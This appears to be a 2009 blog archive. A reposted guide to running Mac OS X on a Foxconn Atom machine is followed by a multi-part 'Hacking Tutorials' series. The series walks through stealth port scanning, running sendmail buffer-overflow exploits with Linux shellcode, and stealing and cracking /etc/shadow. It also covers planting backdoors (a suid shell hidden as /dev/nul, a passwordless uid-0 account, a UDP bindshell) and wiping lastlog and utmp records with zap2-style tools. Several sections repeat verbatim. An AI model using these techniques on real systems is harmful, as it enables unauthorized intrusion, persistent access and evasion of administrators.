Wednesday, May 27, 2009

Legal Hackintosh


Getting Mac OS X up and running on a computer without an Apple label has always been a bit of a hassle. You needed customised Mac OS X disks, updates would ruin all your hard work, and there was lots of fiddling with EFI and the likes. Ever since the release of boot-132, this is no longer the case. Read on for how setting up a "Hack"intosh really is as easy as 1, 3, 2. 



As easy as 1, 3, 2


The most well-known way of setting up a Hackintosh is to download a hacked Mac OS X Leopard image, burn it to a disk, and go from there. This method, while easy, has several disadvantages. First of all, if you're in the United States, or another country with DMCA-like laws, this hacking can actually be against the law, and as such, it might not be a wise thing to do. Secondly, using such hacked Mac OS X images means that updates from Apple, such as the latest Leopard 10.5.7 update, will definitely ruin your system. 

However, ever since September last year, we have a new method, using a small boot CD called boot-132. If I understand it all correctly, it uses a modified Darwin kernel to bootstrap a regular, unaltered Mac OS X Leopard retail disc. Since Darwin is open source, this is completely legal, and doesn't break the DMCA since you're not actually hacking any protection measures. As soon as the regular retail disc is "running", the installer pops up, allowing you to install Mac OS X as if you're using any regular Macintosh. Once the installation is completed, you use the boot-132 CD to boot into the newly installed Leopard, and from there you install a bootloader (Chameleon) which enables you to boot without the CD. 

This method has several advantages. I already named the DMCA advantage, but on top of that comes the fact that since you're using an unaltered copy of Leopard, updates from Apple will install a lot more smoothly than when using a modified installation. Early on, this method was only viable when using hardware exactly the same as Apple uses, but soon after the boot-132 CD could be modified to include drivers for machines with more diverging hardware. Since writing drivers is not illegal, this also doesn't break the DMCA: no actual hacking of Apple code involved. 

Using the boot-132 method, I built myself a non-Apple Macintosh with a flick of the wrist. There were some small bumps along the road, but nothing show-stopping: I'm now enjoying a brand new Macintosh for less than 200 EUR. This computer isn't actually a hackintosh, since no Apple code was hacked to get it running. It only runs Mac OS X; I haven't installed any other operating systems on it. 



The hardware

The hardware used to build this Macintosh amounted to a total price of 199 EUR, ordered at my favourite Dutch online hardware retailer. The core of the system is a Foxconn barebone machine, the Foxconn L10-S3, which uses a slightly modified Intel Atom 330 mini-ITX motherboard (network and audio chip from Realtek). 

Foxconn 45CSX mini-ITX motherboard
Intel Atom 330 processor (dual-core, 2x1.6Ghz)
Intel 945GC+ICH7 chipset
Intel GMA950 graphics chip
Realtek ALC662 audio chip
Realtek RTL8100C ethernet chip
2GB of DDR2 RAM
160GB SATA hard drive
SATA DVD drive


This entire package cost 199.50 EUR here (excl. the DVD drive, I already owned that one), including shipping and 19% VAT. Note that you have to buy Mac OS X Leopard as well from retail! Using the boot-132 method, almost all of the hardware is supported. What is not supported are no deal breakers: the line-in doesn't work (a different driver might solve that), you have to turn HyperThreading off (no support for HT on the Atom 330 in Mac OS X 10.5.7), and sleep doesn't seem to work (some BIOS fiddling might solve that, though). For the rest, everything's supported. 


The guide

After you've ordered all the components from your favourite retailer, and assembled it, it's time to start the guide. Let's take a look at the pre-requisists first: 

The above hardware. This guide only works for this machine. Other machines require different guides.
A retail disc of Mac OS X Leopard; I used a 10.5.6 disc. We don't condone software piracy, so go out and buy one. Apple deserves it for delivering a high-quality operating system.
The Intel D945GCLF2_ISO boot-132 package. This is a modified boot-132 .iso for this specific motherboard.
The driver package for this motherboard. Included in the above D945 package. 
The Chameleon boot loader. Also included in the D945 package.


Let's get started with actually installing Leopard. 

Write the boot-132 .iso found in the D945 package onto a CD or DVD.
Boot using this disc, and when you hit the prompt, press "enter" once, and stop there.
At this point, remove the boot-132 disc, and insert the Leopard retail disc. Wait until the disc is spun up and the indicator light turns off.
Perform the installation. Use Disk Utility to partition the disc using the GUID scheme. I dedicated the entire drive to Mac OS X.
When the machine reboots after the installation, replace the Leopard disc with the boot-132 disc. Press enter at the prompt again, but this time, enter the hexadecimal code for the drive you installed Mac OS X to. This will most likely be 80 (first HDD) or 81 (second HDD). Leopard boots!


Now it's time for the post-installation tasks. 

Upon reboot, install the Chameleon boot loader, supplied with the D945 package.
Install the driver package, also supplied with the D945 package.
Reboot, and note how you no longer need the boot-132 disc.

Updating to Mac OS 10.5.7 is relatively easy, but there are two very important steps. 

Install OSx86Tools, and use this tool to backup your extensions folder - just in case something goes wrong. Be sure to backup to an external medium.
Run Software Update. As a safety precaution, install every update except the Mac OS X 10.5.7 update. This way, if anything goes wrong, you know it is not caused by the 10.5.7 update. You'll have to reboot.
Now it's time to install Mac OS X 10.5.7, again using Software Update. Reboot.
This step is important: go into the BIOS, and disable HyperThreading. Mac OS X 10.5.7 will not boot with HyperThreading enabled, most likely because it does not support it for the Atom 330.
Re-install the diver package.


Using OSx86Tools, there are some fun after-install things to do. They are not required, but fun nonetheless. Using OSx86Tools, you can change the processor and memory strings in "About This Mac" to properly describe the hardware in your machine. Since Leopard doesn't include strings for this hardware, you need to add them yourself. This is skin-deep only; System Profiler won't take it into account. The lack of these strings does not affect the utilisation of your hardware in any way, however. 


Apple stickers

That's it! My small and lovely little (and cheap!) Atom 330 dual-core machine now runs Mac OS X Leopard 10.5.7 without breaking the DMCA or doing any difficult hacking. Updates apply just fine, and software installs and runs without any problems as well. Office 2008 (update to SP1 went fine as well), iLife '08, Adium; they all work without any issues. 

The boot-132 method is the holy grail of the OSx86 community. Apple can't do anything about this, short of introducing special DRM chips in their machines. However, those will get cracked rather quickly, meaning it'll only be a waste of money. The only possible problem here is the EULA, which forbids installing Mac OS X on hardware that is not "Apple-labeled". I solved that issue by placing an actual apple on top of my machine, and I've got various Apple stickers here as well which could solve the problem in a more permanent fashion (I ate the apple...). 

 





Rests me to say that this InsanelyMac forum thread contains a list of modified boot-132 discs and packages for all sorts of hardware. Feel free to check if yours is included!

==================================================================

Post has been retrived from http://mobile.osnews.com/story.php/21564/Building-a-Hackintosh-Apple-Cant-Sue-You-For/ . Author Thom Holwerda .

==================================================================

Thanks for reading

Saturday, May 16, 2009

Hacking Tutorials VI

  Cleaning up
  ~~~~~~~~~~~


Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:

  Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.

So, what will be displayed when luser logsin again?

  Last login: Sun Sep 24 10:32:14 from .

Then luser writes a mail to the admin:

"It has happen some strange thing, when I loggedin today, I've read a line like this:

 Last login: Sun Sep 24 10:32:14 from .

 Does it mean I did login yesterday? It can't be, I don't work on sundays!
 I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone acceded the system using your password, don't
 worry for that, we got his IP. That means we can ask his ISP what phone number did call
 at 10:32 and get . Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in: 
 
/usr/adm/lastlog 
/var/adm/lastlog 
/var/log/lastlog

and we can erase it using lled (get it from my site) 

lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now 
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.


The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?

 sh-2.03$ who
 root tty1 Sep 25 18:18 

Then we shall use zap2. If you loggedin as 'luser', then type:

 sh-2.03$ ./zap2 luser
 Zap2!
 sh-2.03$ who
 sh-2.03$

And luser has never been here.

  Greetings
  ~~~~~~~~~


Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you 
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.

I'd get very happy if you send me a mail telling me your impression about this paper (wether
is good or bad), and you help me to improve it.

I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
or other tutorials like this one. thanks to all.

Hacking Tutorial III

 How to upload and compile programs
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The most obvious and simple way is using FTP:

 bash-2.03$ ls
 program.c
 sh-2.03$ ftp target.edu
 Connected to target.edu.
 220 target.edu FTP server (SunOS 5.6) ready.
 Name: luser
 331 Password required for luser.
 Password:
 230 User luser logged in.
 ftp> put program.c
 200 PORT command successful.
 150 ASCII data connection for program.c (204.42.253.18,57982).
 226 Transfer complete.
 ftp> quit
 221 Goodbye.


But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor
 sh-2.03$ pico exploit.c
if it doesn't work, try this one:
 sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
 ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the 
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

 sh-2.03$ gcc program.c -o program

and execute:

 sh-2.03$ ./program

  Exploiting vulnerabilities
  ~~~~~~~~~~~~~~~~~~~~~~~~~~


This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work, 
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
  if they let you do it, then you shall continue.
  if they don't give you permission, STOP HERE and try with another one.
  shall you continue without their permission, you'd be inquiring law and
  i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

 bash-2.03$ telnet myshellaccount 23
 Trying xx.xx.xx.xx...
 Connected to yourshellaccount.
 Escape character is '^]'.
  Welcome to yourshellaccount
  login: malicioususer
  Password: (it doesn't display)
  Last login: Fry Sep 15 11:45:34 from .
 sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
 sh-2.03$ gcc exploit.c -o exploit
we execute it:
 sh-2.03$ ./exploit
 This is a sendmail 8.9.11 exploit
 usage: ./exploit target port
Sendmail works on port 25, so:
 sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
 $whoami
 root
Damn, we've rooted target.edu!
 $whyamiroot
 because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

 sh-2.03$ telnet target.edu 23
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
  We're running SunOS 5.7
  Welcome to target.edu 

  login: luser
  Password: (it doesn't display)
  Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
  sh-2.03$ whoami
 luser
Are we lusers?
 sh-2.03$ su root
 Password:
Don't think so...
 sh-2.03$ whoami
 root
 sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.

  Exploiting vulnerabilities
  ~~~~~~~~~~~~~~~~~~~~~~~~~~


This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work, 
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
  if they let you do it, then you shall continue.
  if they don't give you permission, STOP HERE and try with another one.
  shall you continue without their permission, you'd be inquiring law and
  i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

 bash-2.03$ telnet myshellaccount 23
 Trying xx.xx.xx.xx...
 Connected to yourshellaccount.
 Escape character is '^]'.
  Welcome to yourshellaccount
  login: malicioususer
  Password: (it doesn't display)
  Last login: Fry Sep 15 11:45:34 from .
 sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
 sh-2.03$ gcc exploit.c -o exploit
we execute it:
 sh-2.03$ ./exploit
 This is a sendmail 8.9.11 exploit
 usage: ./exploit target port
Sendmail works on port 25, so:
 sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
 $whoami
 root
Damn, we've rooted target.edu!
 $whyamiroot
 because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

 sh-2.03$ telnet target.edu 23
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
  We're running SunOS 5.7
  Welcome to target.edu 

  login: luser
  Password: (it doesn't display)
  Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
  sh-2.03$ whoami
 luser
Are we lusers?
 sh-2.03$ su root
 Password:
Don't think so...
 sh-2.03$ whoami
 root
 sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.


  Putting backdoors
  ~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.

It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)

Anyway, i'll explain the basics of it.

1.How to make a sushi:

  To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
  permissions:

 sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
 sh-2.03$ cd /dev
 sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
 sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:
 sh-2.03$ exit

Then, when we come back some day:
 sh-2.03$ whoami
 luser
 sh-2.03$ /dev/nul
 sh-2.03$ whoami
 root
We're superluser again!


There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)

2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd
try this:
 sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
 sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.

This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell

When uid=0 and gid=0, that luser gets superluser priviledges.

Then we add a line like this:

 dood::0:0:dood:/:/bin/sh (put it in a hidden place)


So, once we get a shell, we type:
 sh-2.03$ su dood
 sh-2.03$ whoami
 dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develope.


3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.

=================================================================

=================================================================

Discilamer:

These blog series are for educational purpose only. Please ask the person you wanna hack to before doing anything.

i'll not be responisible in any casse!!















Hacking Tutorials II

 TCP ports and scanning
  ~~~~~~~~~~~~~~~~~~~~~~


Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

 Port number Common service Example daemon (d stands for daemon)
  21 FTP FTPd
  23 Telnet telnetd
  25 SMTP sendmail (yes!)
  80 HTTP apache
  110 POP3 qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
  (it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

 bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

 bash-2.03$ nmap -sS target.edu

 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
 Interesting ports on target.edu (xx.xx.xx.xx):
 (The 1518 ports scanned but not shown below are in state: closed)
 Port State Service
 21/tcp open ftp
 23/tcp open telnet
 25/tcp open smtp
 80/tcp open http
 110/tcp open pop3


 Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

 bash-2.03$ telnet target.edu 21
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
 220 target.edu FTP server (SunOS 5.6) ready.
 quit
 221 Goodbye.
 Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

 bash-2.03$ telnet target.edu 25
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
 220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
 400 (EDT)
 quit
 221 2.0.0 target.edu closing connection
 Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

 bash-2.03$ nmap -sS target.edu

 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
 Interesting ports on target.edu (xx.xx.xx.xx):
 (The 1518 ports scanned but not shown below are in state: closed)
 Port State Service
 21/tcp open ftp
 23/tcp open telnet
 25/tcp open smtp
 80/tcp open http
 110/tcp open pop3

 TCP Sequence Prediction: Class=random positive increments
  Difficulty=937544 (Good luck!)
 Remote operating system guess: Linux 2.1.122 - 2.2.14

 Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

 bash-2.03$ man nmap.

===================================================================

===================================================================

Now i stongly suggest you to practise each and everything we learned today and then jump to next post!

===================================================================

Discilamer:

These blog series are for educational purpose only. Please ask the person you wanna hack to before doing anything.

i'll not be responisible in any casse!!

Hacking Tutorials II

 TCP ports and scanning
  ~~~~~~~~~~~~~~~~~~~~~~


Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

 Port number Common service Example daemon (d stands for daemon)
  21 FTP FTPd
  23 Telnet telnetd
  25 SMTP sendmail (yes!)
  80 HTTP apache
  110 POP3 qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
  (it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

 bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

 bash-2.03$ nmap -sS target.edu

 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
 Interesting ports on target.edu (xx.xx.xx.xx):
 (The 1518 ports scanned but not shown below are in state: closed)
 Port State Service
 21/tcp open ftp
 23/tcp open telnet
 25/tcp open smtp
 80/tcp open http
 110/tcp open pop3


 Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

 bash-2.03$ telnet target.edu 21
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
 220 target.edu FTP server (SunOS 5.6) ready.
 quit
 221 Goodbye.
 Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

 bash-2.03$ telnet target.edu 25
 Trying xx.xx.xx.xx...
 Connected to target.edu.
 Escape character is '^]'.
 220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
 400 (EDT)
 quit
 221 2.0.0 target.edu closing connection
 Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

 bash-2.03$ nmap -sS target.edu

 Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
 Interesting ports on target.edu (xx.xx.xx.xx):
 (The 1518 ports scanned but not shown below are in state: closed)
 Port State Service
 21/tcp open ftp
 23/tcp open telnet
 25/tcp open smtp
 80/tcp open http
 110/tcp open pop3

 TCP Sequence Prediction: Class=random positive increments
  Difficulty=937544 (Good luck!)
 Remote operating system guess: Linux 2.1.122 - 2.2.14

 Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

 bash-2.03$ man nmap.

===================================================================

===================================================================

Now i stongly suggest you to practise each and everything we learned today



Hacking Tutorials I

  Let's start
  ~~~~~~~~~~~


If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.

You won't understand some things from my tutorial until you unpoison your brain.

 Some definitions
  ~~~~~~~~~~~~~~~~


I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.

